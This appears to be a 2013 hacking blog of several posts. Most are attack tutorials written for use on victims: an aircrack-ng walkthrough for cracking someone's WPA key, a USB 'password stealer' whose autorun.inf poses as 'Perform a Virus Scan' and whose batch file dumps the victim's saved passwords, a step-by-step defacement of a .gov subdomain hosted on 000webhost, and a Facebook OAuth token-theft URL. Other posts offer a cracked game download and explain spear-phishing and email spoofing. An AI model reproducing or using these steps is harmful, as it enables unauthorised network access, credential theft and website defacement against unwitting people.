Recent Posts

Thursday, December 19, 2013

Cracking Wireless (WPA)


 


This chapter will teach you how to crack the WPA of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at http://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similar in newer versions. Backtrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial. Cracking WPA isn't 100% going to work everytime. It depends on how easy their WPA password is, and how good your dictionary file is.
What you will need:
  1. Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website.
  2. Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor
  3. Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
  4. Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.
  5. type in: airmon-ng
  6. Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is.
  7. type: airmon-ng stop wlan0
  8. type: macchanger --mac 00:11:22:33:44:55 wlan0
  9. type: airmon-ng start wlan0
  10. type: airodump-ng wlan0
  11. You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.
  12. type: airodump-ng -c (put the channel # here) -w wpahack --bssid (enter bssid here) wlan0
  13. Keep that window open, now open another command terminal and enter the following in the newly opened terminal:
  14. type: aireplay-ng -0 5 -a (enter bssid here) wlan0
  15. type: aircrack-ng wpahack.cap -w (path to a dictionary file)
  16. You should now see it attempting to crack the WPA key. This could take awhile depending on how big the dictionary file is, and how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WPA on the screen :)
NOTES:
This won't work if you dont get a WPA handshake. The command terminal will let you know if you've received the WPA handshake or not.
Hacking WPA isn't 100% going to work every time. It will only work if their WPA password is in the dictionary file you're using. The bigger the dictionary file, the better your chances, the longer it will take.
It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.

Tuesday, November 19, 2013

Subway Surfers new Orleans v1.15.0. With unlimited coins and key

 

Hello Guys today we come with a most popular game in android market. This  latest version of Subway Surfers new Orleans v1.15.0. With many benefits. 

Our hack version benefits .
  • Unlimited conies
  • Unlimited keys
  • With Facebook share
Feature of Subway Surfers new Orleans v1.15.0
  • DASH as fast as you can!
  • DODGE the oncoming trains!
  • Help Jake, Tricky & Fresh escape from the grumpy Inspector and his dog.
  • ? Grind trains with your cool crew!
  • ? Colorful and vivid HD graphics!
  • ? Hoverboard Surfing!
  • ? Paint powered jetpack!
  • ? Lightning fast swipe acrobatics!
  • ? Challenge and help your friends!
  • Join the most daring chase!
  • A Universal App with HD optimized graphics.
  • By Kiloo Games and Sybo Games
What's New
? Celebrate Halloween with the Subway Surfers in New Orleans
? Explore the spooktacular Subway
? Prepare King and Frank for Trick-or-Treating with a sweet Halloween Outfits
? Collect the pumpkins on the tracks to get cool Weekly Hunt prizes.
Download Subway Surfers new Orleans v1.15.0. With unlimited coins and key

or

Sunday, May 19, 2013

Minor flaw allows Hacker to hijack Avira Antivirus customers accounts





Cross site scripting vulnerabilities are mistakenly considered unimportant, but they could allow attackers to inject client-side script in web pages visited by victims.

A cross-site scripting (xss) vulnerability may be exploited by hackers to bypass access controls going beyond the exceptions.
An Egyptian information security advisor Ebrahim Hegazy (Zigoo) has found an XSS vulnerability in the Avira license daemon. license.avira.com
But instead of exploiting it in a normal way "alert('MyName')" stuff and then reporting, He decided to demonstrate it to Avira security team in a different mode with the purposes to show how could an XSS vulnerability allows the hackers to steal user accounts with a clear text data!
To demonstrate this attack he has created 4 files:

avira.html - the fake login page
log.php - the logger which will log the credentials as clear text into txt file
avira.txt - credentials will be found here
done.html - will show a congratulation message to fool the users


According to Ebrahim Hegazy, Avira team responded promptly and fixed the flaw in short time. For those who consider XSS vulnerability as low severity vulnerability, now you can change your opinion.

Credits: Ebrahim Hegazy is an information security advisor @Starware Group, acknowledged by Google, Microsoft and Ebay for finding and reporting multiple vulnerabilities in their applications.

Wednesday, May 15, 2013

Real facebook hacking 2013

Facebook OAuth is used to communicate between Applications & Facebook users, to grant additional permissions to your favorite apps. To make this possible, users have to 'allow or accept' the application request so that app can access your account information with required permissions.

As a normal Facebook user we always think that it is better than entering your Facebook credentials, we can just allow specific permissions to an app in order to make it work with your account.

Today whitehat Hacker 'Nir Goldshlager' reported 'The Hacker News' that he discovered a very critical vulnerability in Facebook's OAuth system, that allowed him to get full control over any Facebook account easily even without 'allow or accept' options.


For this purpose he hunt the flaw in a very mannered way i.e
Step 1) Understanding the OAuth URL
Step 2) Finding a way to use custom parameters in URL
Step 3) Bypassing OAuth 'Allow' button request at user end

1.) Understanding the OAuth URL
The Facebook OAuth dialog URL is something like shown below:

https://www.facebook.com/dialog/oauth/?app_id=YOUR_APP_ID&next=YOUR_REDIRECT_URL&state=YOUR_STATE_VALUE&scope=COMMA_SEPARATED_LIST_OF_PERMISSION_NAMES

zyngaallowdomain












Where app_id is the application ID and next parameter must contains the URL of the respective app domain only. For example app_id=2389801228 belongs to 'Texas Holdem Poker' app, So the 'next' parameter will allow only zynga.com domain (i.e next=http://zynga.com), otherwise Facebook will block that action.

2.) Finding a way to use custom parameters in URL
Goldshlager found that Facebook was allowing him to use facebook's sub domain in next parameter in the URL ie. https://beta.facebook.com/#xxx!/messages/. But '#xxx!' was not working for all browsers. After fuzzing the URL characters, he found that %23~! and %23%09! worked for all browsers.

This finding was enough to redirect user to any file or folder at Facebook domain.
Then he developed a simple Facebook application (i.e touch.facebook.com/apps/testestestte) ,which  was just to redirecting users to remote site (i.e. files.nirgoldshlager.com) with access token, where a log file was ready to store all access tokens.

3.) Bypassing OAuth 'Allow' button request at user end
Till now attacker was able to redirect user to a fake app, which was passing victim's access tokens to a 3rd party domain where attacker was logging access tokens. But the main issue was still there i.e without user interaction, app will not work. That means, one have to click 'allow' button as shown below.
allowthisaction












So, to bypass this, he discovered that there are many built-in Facebook applications i.e 'Facebook Messenger app' that can access full permissions (read inbox, outbox, manage pages, manage ads,access to private photos, videos, etc.) from the victim's account without
user interaction i.e no need to click 'allow' button.

i.e Sample Final URL :

https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https%3A%2F%2Ftouch.facebook.com%2F%23~!%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token
This way attacker is now able to grab access tokens (with full permissions) of any Facebook account by just making his victims to visit a modified OAuth URL (without user interaction). This access_token will be never expired, It will expired only after the victim change his Facebook password
As a responsible bug hunter, Nir Goldshlager reported this flaw to Facebook security team few months back and now it is fixed. He was rewarded many times in bug bounty program. In January he also reported a password reset vulnerability in Facebook Employees Secure Files Transfer service


Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Thursday, April 25, 2013

make money online with your graphic designing skills

                                                      


 
 
 
 
 
usingdesigncrowd for Graphic Designers is simple and easy, Goto website and Post your design Project and . Specify your budget, and add some other instructions about it.
  • Dollars will be payable to all the designers so designers can get more profit rather than Indian ruppee for their work.
  • many online logo design contests held everyday . so if you are a designer you have a chance to earn upto 400$ for each Contest.
  • DesignCrowd support Best payment gateway so there might nt be any truble in accepting payments for Contestent or Designer.
  •  
  • 250-x-250.png (250×250)
     

Friday, April 12, 2013

000webhost DNS Hijacking Vulnerablity - Thousends of Websites including .gov domains Can be Hacked

Hi Mates, Happy New Year To All !
So let see the DNS Hijacking Vulnerablity making Thousends of Websites hosted on 000webhost and other free hosting webhosting Proivders.

Step 1 : signup for a account on 000webhost.com
it will give you a address like abcd.something.com
for example mine was : http://testingfu.comule.com

Now Goto cPanel
and Look for IP Adress, you'll get something like "31.170.163.140"

Now Goto Bing .com and type dork ip:31.170.163.140
if you want .gov .edu or any other particular domain then dork will " ip:31.170.163.140 .gov "
or " ip:31.170.163.140 .edu "
all server ips
Server 1 with 253 ips
31.170.161.1 - 31.170.161.253



Server 2
with with 253 ips
31.170.162.1 - 31.170.162.253

Server 3 w
ith 242 ips
31.170.163.1 - 31.170.163.241
Now come to Search Results 
 i got The Target csirt.gov.bd
i just open this url :
abcd.csirt.gov.bd
and here a error page of 000webhost.


which shows that the dns is configured so that the site is forwarded to Nameserver of 000webhost
now what i did is enter in my cpanel which i created at 000webhost and park a subdomain :

cats.jpg (467×213)
cats.jpg (577×512)
men.csirt.gov.bd
bd.csirt.gov.bd

and done added a deface page to my public_html
and the website defaced .

Wednesday, March 20, 2013

Phishing Techniques: Similarities, Differences and Trends


Introduction
Spear-phishing is a technique by which a cyber-criminal falsely presents himself in an electronic communication as a CEO, director, manager or a subordinate (an insider) of a particular firm or department of government where his victim works to earn their trust, or he impersonates an entity which is either trusted by the targeted firm/government or the latter has relations or obligations towards it.
To illustrate, a fake FBI subpoena was sent by a cyber-criminal to deceive his targets into installing an add-on in order to “view” it, which resulted in a malware being installed on the victim’s computer. The goal of this masquerade is to infiltrate the entity’s computer system through the victim’s access to it and steal confidential information such as trade secrets, military information, personnel information, corporate intellectual property, etc. The intruder steals data that can either be sold for material gain when the information is sold on the black market or used for non-material gain. The collected information can then later be used to the cyber-criminal’s benefit and most likely to the detriment of the targeted entity.
Targeted phishing could as well merely aim at making the victim divulge personal information such as credit card details like mass phishing, but in the disguise of an electronic communication coming from an insider of the victim’s workplace or in another manner target the victim. The difference between mass phishing and spear-phishing is that in spear-phishing, only the employees of a particular entity are targeted, whereas in mass phishing, the targets are random and the perpetrators only desire to extract personal information from the victims.
Furthermore, in spear-phishing, perpetrators often disguise their messages as coming from within the entity they wish to penetrate which is also where the target works, whereas in mass-phishing, they impersonate a global and/or popular brand to which the victim may or may not be a customer and such cyber-criminals do not wish to infiltrate the brand they impersonate.
Whaling is a type of spear-phishing in which the targets are high-profile individuals only such as CEOs, managing directors and high-ranking governmental officials.
Spear-phishing and Whaling
File extension in attachment and file format exploits
Spear-phishing is referred to as “the main email attachment threat”. A common manner of tricking targets in spear-phishing is to disguise a malicious attachment in a file extension that the victim will not open as a corporate document in a popular file extension used for various documents(1). The fake file extension could also imitate a legitimate image format. The other manner is to use trusted file extensions but take advantage of program vulnerabilities to gain access to the victim’s machine when he opens the attachment (2). Such file format exploits that enable the perpetrator to access the information stored on the victim’s device are gaining popularity and usage, and are, in general, a more successful means of tricking the target than disguising the file extension.
(1) The first manner requires little technical knowledge. A file extension can be concealed or disguised as benevolent by utilizing numerous tricks.
To con the potential victim, the spear-phisher makes the file extension look and feel like an innocent document such as “Business plan, amended 2013_2014.pdf” .or it could be any popular file extension or document name.
First, the phisher might take advantage of the option “Hide extensions for known file types” in Windows which is checked by default. Using this method, an .exe file extension will not be shown and a file.pdf.exe would appear as file.pdf. To further the scam, the phisher would use an Adobe symbol as an icon. Any icon can appear with the file, so .jpg and a myriad others could also be imitated. This method of hiding extensions is easily stopped as all you have to do is uncheck this option.
Second, the phisher might attach a file which is a shortcut, enabling this shortcut to have a masked real file extension but appearing with any name and extension he desires. In this way, the shortcut can be set to execute a command and serve the function of an .exe file.
Third, RTLO or RLO (Right-to-Left Override unicode) can be used to disguise the file extension by reversing the direction of reading of the file names and their extension while retaining the same type of execution for the extension. For instance, a file named “Business plan, 2013_2014ann[RTLO]fdp.exe” would appear as “Business plan, 2013_2014 annexe.pdf”.
Lastly, the debugger of a legitimate application provided in the attachment can be changed to initialize a malicious executable every time you run the particular legitimate application.
The ways of concealing or disguising a malicious attachment are not exhausted in this discussion.
(2) The fact that exploits of file format bugs and vulnerabilities are being preferred by phishers as a method to infiltrate the targeted entity is not random.
Firstly, such exploits can provide access not only over the process and application which is exploited but over the entire PC’s operating system and machine. File format vulnerabilities are not only a security threat for Windows but also for other operating systems as well, such as Android and Linux. For instance, there is a vulnerability of Adobe Reader v8.x and v9.x which allows an executable file to be launched along with opening the .pdf file if you are using Windows XP SP3. Of course, vulnerabilities are plentiful which gives phishers a lot of discretion.
Thus, malware can easily be installed without your consent and knowledge when you open the file.
Secondly, as such exploited files appear to be legitimate, you can open them and see that the file is what it is supposed to be (text, image, etc.). This will further reduce the chance of you even figuring out that you have been phished which will decrease the chance of you reporting the scam to the appropriate person, taking measures to quickly remove the threat, or taking future precautions.
If nothing is done, the phisher will have unlimited access in terms of duration.
Thus, instead of the common manner and trend of creating fake web sites or pages used in mass phishing to get concrete information such as username and password or credit/debit card details, in spear-phishing and whaling, perpetrators often attempt to gain access to the machine so they can browse through all the corporate or governmental information available there and decide on their own which confidential information would be profitable enough to collect. Moreover, by gaining access to a single machine in the particular work place, they may further attempt to infiltrate its entire computer system.
File format vulnerabilities are most frequently exploited by malicious software. The three file types that were used the most in the previous year for spear-phishing emails were .rtf (38%), .xls (15%) and .zip (13%). It has to be said that the most regularly attached file types accounted for 70% of all such malicious attachments.
Executable files are not used that much, as it has been noted above that file format exploits and not malware in plain sight is preferred for targeted cyber-attacks as it is harder to notice the threat in the file. The chance of the phishing email to be filtered by your email provider will be small and it is difficult to react to the threat as it appears to be a legitimate file.
However, the (1) first manner of concealing a malicious attachment is still used by phishers with very low technical knowledge and in simple phishing attacks (mass phishing).
I have discussed file extension and file format vulnerabilities as a means of infecting the victim in spear-phishing and whaling, as it is estimated that 94% of targeted emails are trying to scam the potential victims through malicious attachments while only 6% use links to trick them.
Customizations in spear-phishing emails (as a result of email spoofing)
Trend Micro has estimated that around 91% of all cyber-attacks start with an email of spear-phishing origin. All it takes for a phisher is to trick one employee of a company into compromising his PC or divulging sensitive information to enable this cyber-criminal to masquerade as the scammed employee and use advanced social engineering techniques to gain further access and obtain more and more confidential/sensitive information. Thus, phishers would try to customize the emails to their targets as much as possible to make these emails seem legitimate and successfully gain access to the recipient’s machine and/or work place.
The first strategy and customization that you will see in a spear-phishing email is email spoofing, which aims to establish trust between you and the scammer. The phisher would mask the From, Return-Path and Reply-To fields in his email to appear as sent from within the company, governmental department or from an entity or authority with which the previous two had dealings with. Note that email spoofing is not limited to spear-phishing and is frequently employed in all phishing techniques, but in spear-phishing and whaling, the sender will be someone you definitely know.
One must be aware that the given email address in these three fields mentioned above can be fake and different from the email address of the actual sender. However, there are numerous ways to spoof an email.
First, phishers can use the network protocol Telnet to connect to the SMTP or ESMTP (Extended Simple Mail Transfer Protocol) of a website, company, organization, etc. and send an e-mail that could be masked as coming from any desired email address. This method is not widely used nowadays, as this legitimate practice has become a victim to anti-spam techniques and because it is a bit sluggish. Most email service providers would warn you that the email might not be coming from the stated email address, or the email might go to the spam folder, etc.
However, customized and spoofed emails “sent” from an email address with which you have communicated before are less likely to go to the spam folder.
Below is an illustration that shows how a spoofed email can be sent to a victim using the above mentioned method:
Fig.1: Screenshot of Command Prompt which shows relaying a spoofed email via Telnet with an ESMTP.
It is quite simple but somewhat ineffective. Here is how the email looks like when you open it:
Fig.2: Screenshot demonstrating how a spoofed email can look like in your inbox.
You can see that this method definitely does not provide good results for phishers anymore. However, if the spoofed email address appears to come from someone with whom you communicate, regularly or not, the email might not go to spam.
To relay an email via telnet, one has to enable Telnet Client on his Windows as it is turned off by default. To do so, you should first go to Control Panel -> Programs and Features -> Turn Windows features on or off -> Telnet Client. Then, you need to open the Command Prompt (Windows Tab, enter in search “command”). Afterwards, you would have to choose the SMTP server by performing nslookup in the Command Prompt to find out the SMTP server address of the website whose server address you are going to use.
The image below shows what you ought to do to get the SMTP server address:
Fig.3: Screenshot of Command Prompt; nslookup
The SMTP server addresses for the website uni-ruse.bg are highlighted. After you have retrieved this information, all you have to do is write “telnet SMTP.server.address 25″ (25 stands for the port number and 25 is almost always used for (E)SMTPs) and follow the procedure from the first figure.
Nevertheless, most ISPs SMTP servers require authentication, which could be manually achieved, and they would, generally, send a message only if it has To and From fields as its own domain name, for instance, the domain in the illustration above. You can relay emails that can have any To and From fields and require no authentication by connecting to aspmx.l.google.com, among other ESMTPs.
Furthermore, this method can not only be ineffective but it could also be risky as your IP address will be stored during the virtual terminal connection. Thus, you can easily get caught and brought to justice. That is why a phisher would have to mask his IP address and whatever links his machine and ISP to the crime scene. Plus, he can get graylisted, which will bar him from using the services of the SMTP for a period of time if he abuses this function in some way.
An easy and somewhat secure method of email spoofing is via a “legitimate” email spoofing provider. Such providers are widely available and are a paradise for phishers, spammers and similar cyber-criminals. In this manner, the email spoofing requires no technical knowledge. A phisher can use the services of Zmail or the former Pseudo Mailer, which was later known as hoaxMail and is now known as Fogmo, among others.
The illustration below shows how Fogmo’s website interface looks like:
Fig.4: Screenshot of http://www.Fogmo.com showing partial interface (after login)
You have to pay a small amount of money to remove “The following message was sent using Fogmo” in the message body which, if not removed, would almost certainly ruin the phishing attempt.
The list of methods phishers use for email spoofing described in this article covers only a fragment of the techniques available.
Customizations in spear-phishing emails (as a result of information gathering)
Most of the information used by phishers to customize their emails comes from the public domain.
The phisher would visit the company’s website, gather your name and email address from there along with any additional information available. After he has collected such basic information about you and the person that he is going to impersonate from the company’s website, the phisher can choose to gather further information from the public domain, for instance, by using OSINT tool such as Maltego.
If the spear-phishing attempt is meant to be more complicated and important like whaling, he can use all this information collected from the public domain to conduct deeper information gathering to collect information not located in the public domain. He can learn what your schedule is, where you are supposed to travel, what documents you are working on, what your tasks and duties are, and include bits of this data in his email which will make you open the attachments or click the links there without any hesitation as to the reliability or the authenticity of the email.
For instance, the phisher might employ dumpster diving to get to the company’s papers and get ahold of projects, plans, decisions, minutes of meetings and other company documents. Afterwards, he may send you a spoofed email from a colleague of yours claiming that he is sending an “amended” version of the document, that he wants you to skim through it, review it, etc., when in fact the document would have file format vulnerabilities which the phisher will have exploited, or the file would be malicious in nature, or be a form of malware in the wild. Thus, it should be a company policy to always shred documents with a shredder before throwing them in the trash.
Thus, so far we have said information gathering occurs firstly through the public domain. This is done through: 1,the company’s website, to collect your name and email address and anything else readily available such as publicly available corporate documents and the phisher can also gain initial information via corporate directories and telephone conversations; 2, open source intelligence and other tools, and also through pictures, social media, forums, blogs, news articles, leaks etc.; and 3, the private sphere, with techniques such as dumpster-diving, social engineering and, rarely, whistleblowers, or by giving the job to a third-party.
An example of the second method of obtaining information would be images. By using tools such as exifdata.com one can not only see the date when the image was created and the camera’s platform, but he can also see the GPS geo-localization of the image if the creator of the photo did it from a device with GPS turned on in its settings, like iPhones are by default. Hence, the phisher might conclude that you have been in a particular place on a particular date and time just by looking at one of your pictures uploaded somewhere in the Internet. To see more about information gathering through pictures, visithttp://resources.infosecinstitute.com/reconnaissance-with-images/.
An instance of the third method is social engineering. The phisher might have gained access to another employee’s computer, data, accounts, etc., which will enable the cyber-criminal to employ more sophisticated social engineering techniques, based on already collected information from the first victim, than would otherwise be available to him to entice other employees into opening the provided attachment or link and, thus, gain further access to the workplace and obtain pricey data.
The scammer can also call support and ask questions or impersonate a trusted entity, for example, to gain initial information about the target.
Furthermore, by adding him to your friends in Facebook or by making this information public, the phisher can freely view your email address, phone number, tastes and preferences, family, and friends which can be used as part of the social engineering technique.
To conclude, always expect your name and job position to be mentioned in the email, along with a familiar email in the From field. Moreover, familiar work-related or personal things may be mentioned along with an attachment that’s seemingly work-related or personal and coming, often, from a colleague of yours.
An example of how effective spear-phishing and whaling can be
In 2011, Google shut down Chinese spear-phishers who targeted senior U.S government officials and officials in different Asian countries, among others. They used spoofed emails to mask the sender as being an acquaintance or a coworker, and some of the emails even had hand-crafted text inserted in the body of the message. Of course, every email was customized to lure the particular target. The cyber-criminals did not only use attachments but inserted “View Download” links that, when opened, would falsely require the victims to authenticate themselves in Gmail. After being scammed, the phishers changed the settings of their mail to forward incoming messages to them.
These attacks might have been aimed at collecting initial information for more quality social engineering techniques. The phishing is claimed to have originated from Jinan, China and the region is a source of other cyber-attacks which might be related as they were “similar”.
Further Trends
Spear-phishing cons 2 people for every 1000 targeted ones but this can vary enormously depending on the methods and customizations employed. For instance, Aaron Ferguson, wanting to prove the colonel effect and the effectiveness of spear-phishing, masked a message as coming from a Colonel Robert Melville of West Point, targeted and sent emails to 500 cadets prompting them to open a link to verify their grades, which around 80% of the cadets clicked. This illustration should show the subjectivity of spear-phishing’s success rate.
Furthermore, the criminal can expect $150,000 in profit from such a campaign while he can only get $14,000 from mass phishing, on average.
Findings from a survey of more than 330 IT professionals last year show that spear-phishing attacks are frequently the root cause of security breaches. 51% of the IT professionals said that they believe their organization was targeted by spear-phishers in the past year. The survey findings also include that larger organizations are more likely to get targeted. This is evident as such organizations not only provide more targets but have more information in terms of quantity and value.
References:
  1. IT Law Wiki, ‘Spear-phishing’. Available at: http://itlaw.wikia.com/wiki/Spear-phishing (Accessed 2/23/2013)
  2. Paul Gil, ‘What is “Whaling”? Is Whaling Like “Spear Phishing”‘, Available at:http://netforbeginners.about.com/od/scamsandidentitytheft/f/What-Is-Whaling-Spear-Phishing.htm(Accessed 3/3/2013)
  3. Antony Savvas, ‘”Spear phishing” the main email attachment threat’, November 29 2012. Available at:http://news.idg.no/cw/art.cfm?id=F04FD271-AB0F-DB8A-31F4EB29297930D5 (Accessed 2/24/2013)
  4. LoredanaBotezatu, ‘Six tricks scammers use to con you into clicking a malicious .exe file’, October 20 2011. Available at: http://www.hotforsecurity.com/blog/six-tricks-scammers-use-to-con-you-into-clicking-a-malicious-exe-file-1184.html (Accessed 2/24/2013)
  5. How-To Geek, ‘How Hackers Can Disguise Malicious Programs With Fake File Extensions’. Available at:http://www.howtogeek.com/127154/how-hackers-can-disguise-malicious-programs-with-fake-file-extensions/ (Accessed 2/24/2013)
  6. Wikipedia, ‘Email spoofing’. Available at: http://en.wikipedia.org/wiki/Email_spoofing (Accessed 3/3/2013)
  7. wikiHow, ‘How to Forge Email’. Available at: http://www.wikihow.com/Forge-Email (Accessed 3/3/2013)
  8. Shathabheesha, ‘Reconnaisance with images’, June 28 2012. Available at:http://resources.infosecinstitute.com/reconnaissance-with-images/ (Accessed 3/3/2013)
  9. Ravi Miranda, ‘Playing mindgames’, July 17 2012. Available at:http://ravimiranda.wordpress.com/tag/colonel-effect/ (Accessed 3/3/2013)
  10. Kevin Poulsen, ‘Google Disrupts Chinese Spear-Phishing Attack on Senior U.S Officials’, 06.01.2011. Available at: http://www.wired.com/threatlevel/2011/06/gmail-hack/ (Accessed 3/3/2013)
  11. SearchSecurity.TechTarget, ‘spear phishing’. Available at:http://searchsecurity.techtarget.com/definition/spear-phishing (Accessed 3/3/2013)
  12. Keith R. Crosley, ‘Spear Phishing Statistics: 2012 Findings from Microsoft TechEd, RSA Security Conference Surveys’, July 18 2012. Available at: http://blog.proofpoint.com/2012/07/spear-phishing-statistics-2012-findings-from-teched-rsa-security-conference-surveys.html (Accessed 3/3/2013)


Saturday, February 23, 2013

How To Make Your Own USB Stealer Steal Password Using Pendrive

| |
We Do use Pendrive/Usb Storage Device for different purpose but i am really interested in hacking friends password using USB Storage device.Sounds different but yes it is possible i found a way to perform it .

As we all know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Also you know know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords form remote Computer.

Before proceeding Download These Required Material

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc

IE Passview: IE passview is a small program that helps us view stored passwords in Internet explorer.

Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password fox:Password fox is a small program used to view Stored passwords in Mozilla Firefox.


Now Downloaded All the required things come to some real stuff

Note:Kindly disable your antivirus before performing these steps

Steps to create Own Usb Stealer

1.First of all download all 5 tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan


save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.


start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt


save the Notepad and rename it from

New Text Document.txt to launch.bat


Copy the launch.bat file also to your USB drive.

Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.


After this you can see saved password in .TXT files

Thanks For Reading